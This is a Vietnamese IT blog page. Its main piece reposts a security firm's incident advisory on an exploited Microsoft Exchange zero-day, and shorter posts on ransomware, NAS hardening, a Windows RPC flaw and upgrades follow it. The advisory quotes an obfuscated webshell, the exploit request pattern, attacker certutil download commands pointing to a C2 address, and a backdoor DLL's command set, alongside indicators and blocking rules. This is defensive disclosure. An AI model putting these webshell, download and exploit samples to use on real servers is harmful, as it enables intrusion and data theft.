CẢNH BÁO CHIẾN DỊCH TẤN CÔNG SỬ DỤNG LỖ HỔNG ZERO DAY TRÊN MICROSOFT EXCHANGE SERVER

Khoảng từ đầu tháng 08/2022, trong quá trình thực hiện giám sát an ninh mạng và xử lý sự cố, Trung tâm vận hành bảo mật GTSC SOC phát hiện một đơn vị trọng yếu bị tấn công an ninh mạng vào hệ thống ứng dụng Microsoft Exchange. Quá trình điều tra, đội ngũ chuyên gia BlueTeam xác định kẻ tấn công đã sử dụng một lỗ hổng bảo mật của Microsoft Exchange chưa từng được công bố – hay còn gọi là lỗ hổng 0-day. GTSC SOC Team ngay lập tức đưa ra phương án ngăn chặn tạm thời. Song song, các chuyên gia RedTeam cũng bắt tay ngay vào việc nghiên cứu, debug lại mã nguồn ứng dụng Mail Exchange để tìm ra mã khai thác (exploit). Với lỗ hổng bảo mật Exchange trước đây, đội ngũ RedTeam cũng đã từng phân tích ra exploit trước khi có exploit được public trên thế giới (1-day exploit) nên việc hiểu luồng, cơ chế xử lý của hệ thống Email Exchange đã giúp giảm thời gian cho quá trình research. Ngay sau khi nghiên cứu ra exploit, GTSC đã submit lên ZDI để làm việc với Microsoft nhằm nhanh chóng có bản vá.

Sau khi ZDI verify đã ghi nhận 2 bug liên quan đến exploit:

Tuy nhiên đến thời điểm hiện tại, GTSC ghi nhận thêm các đơn vị khác cũng đang gặp phải sự cố. Sau khi kiểm tra, GTSC xác nhận hệ thống bị tấn công qua lỗ hổng 0-day này. Để hỗ trợ cộng đồng ngăn chặn tạm thời trước khi có bản vá chính thức từ Microsoft, chúng tôi công bố bài viết này để cảnh báo tới các đơn vị có sử dụng hệ thống email Microsoft Exchange.

Thông tin lỗ hổng bảo mật

– Đội ngũ Blueteam trong quá trình giám sát phát hiện được các request exploit dựa trên log IIS có định dạng giống như lỗ hổng ProxyShell: autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com. Đồng thời kiểm tra các logs khác, nhận thấy kẻ tấn công thực hiện được các câu lệnh trên hệ thống. Kiểm tra version number trên máy chủ Exchange bị tấn công nhận thấy máy chủ đã cài đặt bản cập nhật mới nhất tại thời điểm đó nên không thể có trường hợp khai thác bởi lỗ hổng Proxyshell -> xác nhận máy chủ bị khai thác bởi lỗ hổng 0-day RCE mới. Các thông tin này được Blueteam cung cấp lại cho Redteam, từ đó đội ngũ Redteam của GTSC đã tiến hành nghiên cứu để trả lời cho các câu hỏi như tại sao các request lại giống với request của bug ProxyShell?, luồng RCE được thực hiện như thế nào?

– Kết quả nghiên cứu đã giúp GTSC Redteam thành công tìm ra cách sử dụng đường dẫn trên để truy cập tới 1 component ở backend và thực hiện RCE. Thông tin kỹ thuật chi tiết về lỗ hổng tại thời điểm này chúng tôi xin phép chưa công bố.

Các hành vi sau khai thác

Sau quá trình khai thác thành công lỗ hổng, chúng tôi ghi nhận các hành vi tấn công nhằm thu thập thông tin và tạo chỗ đứng trong hệ thống của nạn nhân. Nhóm tấn công cũng sử dụng các kỹ thuật khác nhau nhằm tạo backdoor trên hệ thống bị ảnh hưởng và thực hiện lateral movement sang các máy chủ khác trong hệ thống.

Webshell

Chúng tôi phát hiện các webshell được drop xuống các máy chủ exchange. Các webshell chúng tôi thu thập được hầu hết được obfuscated. Thông qua User-agent chúng tôi phát hiện attacker sử dụng Antsword (một opensource có tính năng hỗ trợ quản lý webshell).

<%@Page Language=”Jscript”%>

<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘NTcyM’+’jk3O3’+’ZhciB’+’zYWZl’+”+’P’+’S’+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘MQ==’))+char(51450/525)+”+”+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘Wg==’))+’m’+”+’UiO2V’+’2YWwo’+’UmVxd’+’WVzdC’+’5JdGV’+’tWydF’+’WjBXS’+’WFtRG’+’Z6bU8’+’xajhk’+’J10sI’+’HNhZm’+’UpOzE’+’3MTY4’+’OTE7’+”)));%>

Chúng tôi nghi ngờ các hành vi khai thác này xuất phát từ các nhóm tấn công Trung Quốc, dựa trên codepage trong webshell là 936, một bảng mã ký tự Microsoft cho tiếng Trung giản thể (simplified Chinese).

Một đặc điểm đáng chú ý khác, bên cạnh việc drop các webshell mới hacker cũng thực hiện thay đổi nội dung trong file RedirSuiteServiceProxy.aspx thành nội dung webshell. RedirSuiteServiceProxy.aspx là một tên file hợp pháp sẵn có trong máy chủ Exchange

FileName	Path
RedirSuiteServiceProxy.aspx	C:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
Xml.ashx	C:\inetpub\wwwroot\aspnet_client
pxh4HG1v.ashx	C:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth

Trong quá trình xử lý sự cố tại một khách hàng khác, GTSC ghi nhận nhóm tấn công có sử dụng một mẫu webshell khác

Filename: errorEE.aspx

SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257

Ref: https://github.com/antonioCoco/SharPyShell

Command Execution

Bên cạnh các hành vi thu thập thông tin trên hệ thống, attacker thực hiện tải file và kiểm tra kết nối thông qua certutil có sẵn trên môi trường Windows

“cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]

“cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]

Ở cuối của mỗi câu lệnh mà kẻ tấn công thực hiện đều có chuỗi echo [S]&cd&echo [E], một trong những dấu hiệu nhận biết của China Chopper.

Ngoài ra, hacker cũng thực hiện inject DLL độc hại vào bộ nhớ, drop các file nghi ngờ lên các máy chủ bị tấn công, và thực thi các file này thông qua WMIC.

Suspicious File

Trên các máy chủ, chúng tôi phát hiện các file nghi ngờ có định dạng exe và dll

FileName	Path
DrSDKCaller.exe	C:\root\DrSDKCaller.exe
all.exe	C:\Users\Public\all.exe
dump.dll	C:\Users\Public\dump.dll
ad.exe	C:\Users\Public\ad.exe
gpg-error.exe	C:\PerfLogs\gpg-error.exe
cm.exe	C:\PerfLogs\cm.exe
msado32.tlb	C:\Program Files\Common Files\system\ado\msado32.tlb

Trong số các file nghi ngờ trên, dựa vào các câu lệnh được thực hiện trên máy chủ, chúng tôi nhận định các file all.exe, dump.dll có nhiệm vụ trích xuất thông tin tài khoản trên hệ thống máy chủ. Sau các hành vi trích xuất thông tin tài khoản trên hệ thống, attacker sử dụng rar.exe để nén các file dump và copy ra webroot của máy chủ Exchange. Trong quá trình xử lý sự cố, các file trên đã không còn tồn tại trên hệ thống.

File cm.exe được drop xuống thư mục C:\PerfLogs\ là file cmd.exe

Malware Analysis

Thông tin DLL

File name: Dll.dll

Sha256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82

45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9

9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0

29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3

c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

Phân tích DLL

GTSC phân tích một mẫu cụ thể (074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82) để mô tả hành vi của mã độc, các mẫu DLL khác có nhiệm vụ và hành vi giống nhau, chỉ khác nhau về cấu hình listener

DLL gồm 2 hai class: Run và m. Bên trong mỗi class gọi tới các method thực hiện các nhiệm vụ khác nhau. Cụ thể:

Class Run thực hiện tạo listener lắng nghe các kết nối tới port 443, đường dẫn https://*:443/ews/web/webconfig/.

Sau quá trình lắng nghe, mã độc tạo thread mới goi tới r. Method r thực hiện:

– Kiểm tra request nhận được có data trong body hay không. Nếu không có data đi kèm trong request gửi lên máy chủ, kết quả trả về là 404.

– Ngược lại, nếu trong request có đi kèm data, DLL tiếp tục xử lý luồng bên trong nhánh IF:

Kiểm tra request nhận được có tồn tại “RPDbgEsJF9o8S=” hay không. Nếu có, gọi tới method i nằm trong class m để xử lý request nhận được. Kết quả trả về từ Run.m.i sẽ được covert sang chuỗi base64. Kết quả trả về cho client theo format

{

“result”:1,

“message”:”base64(aes(result))”

}

Class m

Method i thực hiện:

– Giải mã request nhận được bằng thuật toán AES với 16 bytes đầu tiên của request là giá trị IV, 16 bytes tiếp theo là giá trị key, các giá trị sau đó là data

– Sau khi giải mã, lấy phần tử đầu tiên trong mảng làm flag để xử lý các case đã được định nghĩa

Case 0: Gọi tới method info. Method này có nhiệm vụ thu thập thông tin hệ thống. Các thông tin bao như kiến trúc hệ điều hành, phiên bản framework, phiên bản hệ điều hành, v.v….GTSC mô phỏng lại case 0 bằng hình ảnh bên dưới. Request gửi lên theo format 16 bytes đầu là giá trị IV, 16 bytes tiếp theo là giá trị key, theo sau là flag để chỉ định option và phần còn lại là data.

base64 (IV | key | aes(flag|data))

Case 1: Gọi tới method sc. Method này có nhiệm vụ cấp phát vùng nhớ để thực thi shellcode

Case 2: Gọi tới 2 method p và r. Method p xử lý các dữ liệu được ngăn cách bởi ký tự “|” lưu vào mảng array3. Mảng array3 sẽ lấy 2 phần tử đầu tiên làm tham số cho method r, method r có nhiệm vụ thực thi command

Case 3: Gọi tới method ld. Method này có nhiệm vụ liệt kê thông tin thư mục và file theo format

D|-|<Ngày tạo> |<Ngày chỉnh sửa> |<tên thư mục hoặc tên file>

o Case 4: Gọi tới method wf. Method này có nhiệm vụ ghi file

o Case 5: Gọi tới method rf. Method này có nhiệm vụ đọc file

Case 6: Tạo thư mục

o Case 7: Xóa file hoặc thư mục

o Case 8: Di chuyển File

o Case 9: Set time cho file

o Case 10: Nạp và thực thi C# bytecode nhận từ request.

Các mẫu DLL khác có nhiệm vụ tương tự, chỉ khác nhau về cấu hình listener như sau:

Victim 1:

https://*:443/ews/web/webconfig/

https://*:443/owa/auth/webcccsd/

https://*:444/ews/auto/

https://*:444/ews/web/api/

Victim 2:

http://*:80/owa/auth/Current/script/

https://*:443/owa/auth/Current/script/

Chúng tôi cũng phát hiện DLL được inject vào memory của tiến trình svchost.exe. DLL thực hiện kết nối gửi nhận dữ liệu tới địa chỉ 137[.]184[.]67[.]33 được config trong binary. Việc gửi nhận dữ liệu với C2 sử dụng thuật toán RC4, khóa sẽ được tạo trong thời gian chạy (runtime).

Các biện pháp ngăn chặn tạm thời

Quá trình xử lý sự cố trực tiếp của GTSC ghi nhận có trên 1 đơn vị tổ chức bị là nạn nhân của chiến dịch tấn công khai thác lỗ hổng zero day. Ngoài ra chúng tôi cũng lo ngại rằng có thể có nhiều tổ chức khác cũng đã bị khai thác nhưng chưa được phát hiện. Trong thời gian chờ đợi bản vá chính thức từ hãng, GTSC cung cấp biện pháp khắc phục tạm thời nhằm giảm thiểu việc tấn công khai thác lổ hổng bằng cách bổ sung rule chặn các request có dấu hiệu tấn công thông qua module URL Rewrite rule trên máy chủ IIS (Webserver)

– Trong Autodiscover tại FrontEnd chọn tab URL Rewrite chọn Request Blocking

– Add thêm chuỗi “.*autodiscover\.json.*\@.*Powershell.*“ vào Pattern (URL Path):

– Condition input: lựa chọn {REQUEST_URI}

Phát hiện tấn công

Nhằm kiểm tra hệ thống đã bị tấn công bởi lổ hỗng này, các đơn vị/tổ chức có thể thực hiện theo các cách thức sau:

Cách 1: Sử dụng powershell với câu lệnh sau: (Sử dụng powershell để thực hiện search trên toàn bộ folder log IIS mất khá nhiều thời gian)

Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter “*.log” | Select-String -Pattern ‘powershell.*autodiscover\.json.*\@.*200

Cấu hình mặc định IIS log nằm tại đường dẫn “%SystemDrive%\inetpub\logs\LogFiles”

Cách 2: Sử dụng công cụ do GTSC phát triển dựa trên dấu hiệu khai thác lỗ hổng, thời gian thực hiện search nhanh hơn so với việc sử dụng powershell. Đường dẫn tải về công cụ: https://github.com/ncsgroupvn/NCSE0Scanner

Cách 3: Sử dụng công cụ của MS luôn nhé Exchange On-premises Mitigation Tool v2 (EOMTv2) link download tại đây

Indicators of Compromise (IOCs)

Webshell:

File Name: pxh4HG1v.ashx

Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx

File Name: RedirSuiteServiceProxy.aspx

Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5

Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: RedirSuiteServiceProxy.aspx

Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca

Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: Xml.ashx

Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

Path: C:\inetpub\wwwroot\aspnet_client\Xml.ashx

Filename: errorEE.aspx

SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257

Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx

DLL

File name: Dll.dll

SHA256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82

45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9

9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0

29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3

c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

File name: 180000000.dll (Dump từ tiến trình Svchost.exe)

SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

125[.]212[.]220[.]48

5[.]180[.]61[.]17

47[.]242[.]39[.]92

61[.]244[.]94[.]85

86[.]48[.]6[.]69

86[.]48[.]12[.]64

94[.]140[.]8[.]48

94[.]140[.]8[.]113

103[.]9[.]76[.]208

103[.]9[.]76[.]211

104[.]244[.]79[.]6

112[.]118[.]48[.]186

122[.]155[.]174[.]188

125[.]212[.]241[.]134

185[.]220[.]101[.]182

194[.]150[.]167[.]88

212[.]119[.]34[.]11

URL:

hxxp://206[.]188[.]196[.]77:8080/themes.aspx

C2:

137[.]184[.]67[.]33

Mitre ATT&CK Mapping

Tatic	ID	Name
Resource Development	T1586.002	Compromise Accounts: Email Accounts
Execution	T1059.003	Command and Scripting Interpreter: Windows Command Shell
Execution	T1047	Windows Management Instrumentation
Persistence	T1505.003	Server Software Component: Web Shell
Defense Evasion	T1070.004	Indicator Removal on Host: File Deletion
Defense Evasion	T1036.005	Masquerading: Match Legitimate Name or Location
Defense Evasion	T1620	Reflective Code Loading
Credential Access	T1003.001	OS Credential Dumping: LSASS Memory
Discovery	T1087	Account Discovery
Discovery	T1083	File and Directory Discovery
Discovery	T1057	Process Discovery
Discovery	T1049	System Network Connections Discovery
Lateral Movement	T1570	Lateral Tool Transfer
Collection	T1560.001	Archive Collected Data: Archive via Utility

28/09/2022

GTSC SECURITY TEAM

Link: https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html

Exchange Server zeroday

Microsoft: Máy chủ Exchange bị tấn công để triển khai ransomware BlackCat

Máy chủ Microsoft Exchange đang là mục tiêu của những kẻ phát tán phần mềm BlackCat Ransomware và có thông tin cho thấy tin tặc đang khai thác các lỗ hổng chưa được vá trên hệ thống để tạo ra phần mềm độc hại mã hóa tệp nói trên.

Người ta đã quan sát thấy rằng trong hơn hai trường hợp, tin tặc có thể đánh cắp thông tin đăng nhập và thông tin chuyển tiếp đến các máy chủ từ xa, để sử dụng dữ liệu đó cho việc tống tiền kép.

Tin tặc đầu tiên tấn công máy chủ nạn nhân trên một ghi chú ban đầu và sau đó được nhìn thấy đang triển khai các tải trọng BlackCat Ransomware trên toàn mạng thông qua PsExec.

Quy trình tấn công như sau:

Microsoft đã lưu ý về tình hình và nghi ngờ rằng các vụ tấn công đang được thực hiện bởi một băng nhóm có liên quan đến ransomware như một hoạt động dịch vụ và đang yêu cầu tất cả các máy chủ trao đổi của họ tuân theo một lời khuyên được đưa ra vào ngày 14 tháng 3 để giảm thiểu các cuộc tấn công ProxyLogon.

Một trong số chúng, một nhóm tội phạm mạng có động cơ tài chính được theo dõi là FIN12, được biết đến với việc triển khai Ryuk, Conti và Hive ransomware trước đây trong các cuộc tấn công chủ yếu nhắm vào các tổ chức chăm sóc sức khỏe.

Công ty công nghệ này đang kêu gọi các tổ chức sử dụng một giải pháp toàn diện như Microsoft 365 Defender của riêng mình để bảo vệ các rủi ro liên quan đến các cuộc tấn công và đã đưa ra lời khuyên chi tiết để hạn chế các vấn đề phát sinh từ các cuộc tấn công mạng.

LƯU Ý- Các phiên bản Ransomware của BlackCat đang hoạt động trên cả phiên bản Windows và Linux và trong môi trường của VMware ESXi. Kể từ năm 2021, phần mềm độc hại mã hóa tệp tin còn được gọi là ransomware ALPHV đã được nhìn thấy yêu cầu 5 triệu đô la từ các nạn nhân của nó.

Phương Nguyễn dịch

Nguồn https://www.cybersecurity-insiders.com/blackcat-ransomware-is-being-induced-into-microsoft-exchange-servers

blackcat Exchange Server

Một số cách bảo mật NAS Sysnology 7.0-7.1 trở lên

Bài viết này Phương Nguyễn hướng dẫn các bạn system admin cấu hình bảo mật cho các thiết bị NAS Sysnology phiên bản 7.0 trở lên nhé. Vì những ưu việc tính năng vượt trội của DSM 7.0-7.1 về bảo mật hệ thống cho NAS chống các rủi ro bảo mật hệ thống NAS mà Sysnology mang lại. Bạn nào chưa update thì update ngay nhé. Xem bài viết hướng dẫn update tại đây.

Bảo mật chung-General

Vào control panel-> Chọn security-> General.

Hẹn giờ đăng xuất (phút): Người dùng sẽ tự động đăng xuất khỏi DSM nếu họ không hoạt động trong khoảng thời gian được chỉ định tại đây. Nhập bất kỳ giá trị nào từ 1 đến 65535.
Tăng cường khả năng tương thích của trình duyệt bằng cách bỏ qua kiểm tra IP: Nếu bạn truy cập NAS Synology thông qua proxy HTTP và gặp phải các lần đăng xuất ngẫu nhiên, bạn có thể bật tùy chọn này để bỏ qua kiểm tra IP.
Cải thiện khả năng bảo vệ chống lại các cuộc tấn công giả mạo yêu cầu trên nhiều trang web: Tùy chọn này tăng cường khả năng bảo vệ của hệ thống chống lại các cuộc tấn công tạo kịch bản trên nhiều trang web. Tùy chọn này sẽ có hiệu lực vào lần tiếp theo bạn đăng nhập vào DSM.
Cải thiện bảo mật với tiêu đề Chính sách bảo mật nội dung HTTP (CSP): Tùy chọn này tăng cường bảo mật của hệ thống chống lại các cuộc tấn công tập lệnh xuyên trang (XSS) bằng cách chỉ cho phép dữ liệu từ các nguồn đáng tin cậy và hạn chế thực thi tập lệnh nội tuyến.
Không cho phép nhúng DSM với iFrame: Bạn có thể bật tùy chọn này để hạn chế các trang web khác nhúng DSM vào các trang web khác với iFrame, do đó ngăn chặn một số kiểu tấn công từ các trang web độc hại. Để cho phép các trang web cụ thể nhúng DSM với iFrame, hãy nhấp vào Trang web được phép, thêm trang web, đi tới Bảng điều khiển> Cổng đăng nhập> DSM> Miền, thiết lập miền tùy chỉnh và đánh dấu vào Bật HSTS buộc trình duyệt sử dụng kết nối bảo mật. Đảm bảo rằng NAS Synology của bạn có chứng chỉ hợp lệ.
Xóa tất cả các phiên đăng nhập của người dùng đã lưu khi khởi động lại hệ thống: Tùy chọn này ngăn các lỗi hệ thống không mong muốn xảy ra nếu người dùng vẫn đăng nhập và thực hiện các thao tác trên hệ thống trong khi hệ thống đang sẵn sàng. Với tùy chọn này được bật, tất cả người dùng sẽ cần đăng nhập lại sau khi hệ thống khởi động lại.
Hiển thị thông báo trên màn hình DSM khi IP hiện tại thay đổi: Khi IP của người dùng hiện đang kết nối thay đổi, hãy gửi thông báo trên màn hình cho người dùng đó.
Trust Proxy: có thể đưa vào danh sách list các IP tin tưởng proxy.

Tài khoản-Account

Cần phải đặt mật khẩu phức tạp và bật tính năng xác thực 2 bước 2FA kết hợp với approve sign khi đăng nhập vào quản trị DSM (OTP hoặc HSM)

Tường lửa-Firewall

Cần phải bật tường lửa và cấu hình chính sách truy cập và cho phép dịch vụ nào ip nào truy cập NAS có thể hiểu như 1 Acclist truy cập.

Bảo vệ -Protection

Định nghĩa thời gian truy cập và khóa theo IP có thể cho phép đưa blocklist IP network ip cũng như allow network nào.

Và bật DDOS Protection.

Nâng cao- Advances

Một số thiết lập bảo mật nâng cao khác.

Phương Nguyễn biên soạn

Bảo mật

Thông tin cảnh báo 7 lỗ hổng bảo mật mới của Microsoft CVE-2022-26809

Tổng quan:

Cảnh báo nhanh về lỗ hổng 0day CVE-2022-26809, Lỗ hổng thực thi mã từ xa trong Windows RPC Runtime không cần xác thực đang bị khai thác trong tự nhiên. Lỗ hổng chưa có nhiều thông tin đánh giá và phân tích chi tiết hay PoC được công bố. Tuy vậy cũng cần nắm bắt đề phòng, kịp thời phản ứng. Ngoài ra cũng cập nhật thêm thông tin một số lỗ hổng cần chú ý trong bản vá tháng 4 của Microsoft.

Phạm vi ảnh hưởng/Điều kiện khai thác ( CVE-2022-26809 ):

Hệ thống mở port 445 ra ngoài internet đều dễ bị tấn công
Các phiên bản Windows chưa được cập nhật bản vá tháng 4 mới nhất đều bị ảnh hưởng
Không cần thông tin xác thực

Thông tin chi tiết:

CVE-2022-26809: Windows RPC Runtime RCE không cần xác thực

Lỗ hổng nằm trong thư viện rpcrt4.dll của Windows RPC Runtime. Hai function là OSF_CCALL::ProcessResponse and OSF_SCALL::ProcessReceivedPDU đảm nhận việc xử lý các gói tin RPC ở phía client (CCALL) và server (SCALL).

Trong đó tại hàm QUEUE :: PutOnQueue thuộc OSF_SCALL ::

ProcessReceivePDU có chức năng kiểm tra việc tràn số nguyên ( integer overflows

check ).

	int64 	fastcall sub_l80042028(unsigned int currentvalue, int addition, int *output) {
unsigned int afterAddition; // eax
int v4; // edx
	int64 result; // rax
afterAddition = currentvalue + addition;
v4 = -1;
if ( afterAddition >= currentvalue )
v4 = afterAddition;
result = afterAddition < currentvalue ? 0x80070216 : 0;
’output = v4;
return result;
}

Tại OSF_SCALL:GetCoalescedBuffer việc tràn số nguyên này có thể gây lỗi heap buffer overflow từ đó có thể ghi ngoài giới hạn bộ đệm heap và thực thi mã tùy ý. Một số hàm khác cũng tương tự bao gồm:

OSF_CCALL::ProcessResponse
OSF_SCALL::GetCoalescedBuffer
OSF_CCALL::GetCoalescedBuffer

Một số lỗ hổng cần quan tâm trong Patch Tuesday tháng 4 của Microsoft

Trong tháng 04/2022, Microsoft đã phát hành bản vá cho 117 lỗ hổng (chưa bao gồm 17 lỗ hổng trong Microsoft Edge), trong đó có 9 lỗ hổng được đánh giá ở mức Nghiêm Trọng và 108 lỗ hổng được đánh giá là Quan Trọng. Tỉ trọng số lượng lỗ hổng như sau: Thực thi mã từ xa (RCE) và Leo thang đặc quyền (EoP) đều chiếm tỉ trọng lớn với 39,3%. Trong các lỗ hổng được vá lần này, cần lưu ý một số CVE được Microsoft đánh giá là nguy hiểm, có khả năng bị tấn công cao trong thực tế:

CVE

Lỗ hổng

CVSS

Mô tả

CVE-2022-

26809

RPC Runtime Library Remote Code

9.8

Lỗ hổng thực thi mã từ xa trong RPC Runtime Library. Chưa có thông tin chi

	Execution Vulnerability		tiết và PoC liên quan đến lỗ hổng trên không gian mạng.
CVE-2022- 24491/24497	Windows Network File System Remote Code Execution Vulnerability	9.8	Lỗ hổng thực thi mã từ xa trong Windows Network File System. Chưa có thông tin chi tiết và PoC liên quan đến lỗ hổng trên không gian mạng.
CVE-2022- 26815	Windows DNS Server Remote Code Execution Vulnerability	7.2	Lỗ hổng thực thi mã từ xa trong Windows DNS Server. Chưa có thông tin chi tiết và PoC liên quan đến lỗ hổng trên không gian mạng.
CVE-2022- 26904	Windows User Profile Service Elevation of Privilege Vulnerability	7.0	Lỗ hổng leo thang đặc quyền trong Windows User Profile Service. Lỗ hổng đã có PoC công bố trên không gian mạng.
CVE-2022- 24521	Windows Common Log File System Driver Elevation of Privilege Vulnerability	7.8	Lỗ hổng leo thang đặc quyền trong Windows Common Log File System Driver. Lỗ hổng chưa có thông tin chi tiết và PoC công bố trên không gian mạng. Tuy nhiên, lỗ hổng đã được khai thác trong thực tế.

Cách phòng tránh/fix lỗi/phát hiện:

Lỗ hổng không có dấu hiệu nhận biết cụ thể. Chặn hoặc hạn chế kết nối từ port 445 từ ngoài mạng internet/mạng không phải kết nối trust. Áp dụng khuyến nghị bảo mật giao thức SMB theo nhà phát triển tại :

https://docs.microsoft.com/en-us/windows-server/storage/file-server/smb-secure-traffic

Đề nghị cập nhật bản vá theo đường dẫn phù hợp với từng sản phẩm tại:

https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr

Hoặc theo các CVE khuyến cáo như sau:

CVE	Bản vá
CVE-2022-26809	https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809
CVE-2022- 24491/24497	https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2022-24491 https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2022-24497

CVE-2022-26815	https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2022-26815
CVE-2022-26904	https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904
CVE-2022-24521	https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2022-24521

Phương Nguyễn

CVE-2022-26809

Chia sẽ 1 số cách bảo mật SQL Server

Sáng nay có bạn alo hỏi vụ sql tấn công và ăn cua…
Tình hình có vẻ căng vụ publishing port SQL Server 1433 nhất là thuê hosting vps.
Một số ý khuyến cáo chia sẽ ae bảo mật Server SQL:
1/ Buộc phải có tường lửa nếu thuê hosting thì cũng nên thuê thêm. Còn túng quá change port SQL.
2/ Access policy cho 1 số dịch vụ out in.
3/ Change mật khẩu quản trị sa mức độ phức tạp tránh bị bruce force.
4/ Phân quyền user logon và user ower db cần thiết. Không sử dụng quyền sa hoặc system admin roles để chạy user databases.
5/ Bảo mật chính application các bạn đang chạy như password admin root hay tài khoản có quyền admin…
6/ Update path KB mới nhất MSSQL.
7/ Update Os Windows Server mới nhất.
8/ Cài đặt antivirus và update mới nhất bật ips nếu có ví dụ SEP, Kis, mcafee….
9/ Công tác này rất quan trọng là rà soát backup 3-2-1 tốt nhất backup lên đám mây và sử dụng VPN tránh bị ăn ransomware…
Những ai đang chạy public trực tiếp xem xét khoá lại. Bài viết không nói rõ ứng dụng đích danh nào mà nói chung cho tất cả ứng dụng sử dụng SQL làm CSDL.
Nghe đâu SQL server đang bị dính Cobalt Strike.

#jsisen #phuongit #sqlserver #CobaltStrike #warning #cve202226809

Vui lòng ghi rõ nguồn nếu copy

Phương Nguyễn

HƯỚNG DẪN UPGRADE NAS 920 SYNOLOGY TỪ DSM 6.2.4-25556-UPDATE 5 LÊN 7.0.1

Thông tin

NAS synology DS920+

OS: DSM 6.2.4-25556 UPDATE 5

Yêu cầu OS DSM 7.0.1

Trước khi thực hiện phải backup full config vì phiên bản 7.0.1 nó thay đổi hoàn toàn cấu trúc so với phiên bản trước đó.

Cách thực hiện

Logon vào Quản lý

Vào mục: Control panel -> Updates & Restore=> chọn Download

Download xong chọn vào Upgrade như hình:

Tương tự như các lần upgrade phải disconnect các kết nối ISCSI:

Nôm na backup config NAS trước khi upgrade vì version này nó thay đổi kiến trúc khá nhiều so với phiên bản 6.x

Quá trình ugprade sẽ diễn ra 1-10 phút

Quá trình cập nhật đã xong nhé. Giao diện khá đẹp

Chúc các bạn thành công

Phương Nguyễn

NAS Synology

Hướng dẫn upgrade NAS 920 Synology từ DSM 6.2.4-25556 Update 2-Update 5

Thông tin

NAS synology DS920+

OS: DSM 6.2.4-25556 UPDATE 2

Cách thực hiện

Logon vào Quản lý

Vào mục: Control panel -> Updates & Restore

Chọn Download DSM 6.2.4-25556 UPDATE 5

Sau khi download-> Update Now

Chọn Next tạm thời disconnect iscsi

Chờ khoảng 10 phút nhé

Kiểm tra lại

Đã update thành công nhé.

Chúc các bạn thành công

Phương Nguyễn IT

DS920 NAS Synology

Cách xử lý lỗi DAG A server-side administrative operation failed incorrectly config static address

a_server_side_administrator_operation_failed_dag_exchange #phuongnguyenit #exchangeserver

Cách xử lý lỗi Add thành viên Server DAG bị lỗi | A server-side administrative operation failed
A server-side database availability group administrative operation failed. Error The operation failed. CreateCluster errors may result from incorrectly configured static addresses. Error: Windows Failover Clustering isn’t installed on ‘NVpSRVEX01’’ | Phương nguyễn IT
Clip này chia sẻ lỗi khi add 1 thành viên server vào DAG exchange server sẻ báo lỗi nếu thành viên bật IPV6. Chúng ta phải tắt IPV6 tại network setting và trong thanh ghi-regedit
Tạo khóa DisabledComponents kiểu DWORD giá trị ffffffff theo đường dẫn
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters

Exchange DAG

HƯỚNG DẪN UGPRADE SQL SERVER 2008R2 RTM, SP1-SP3

Thông tin phiên bản

Download

SQL Server 2008R2 10.50.1617.0

Tham khảo tại đây

https://sqlserverbuilds.blogspot.com/2008/05/sql-server-2008-r2-versions.html

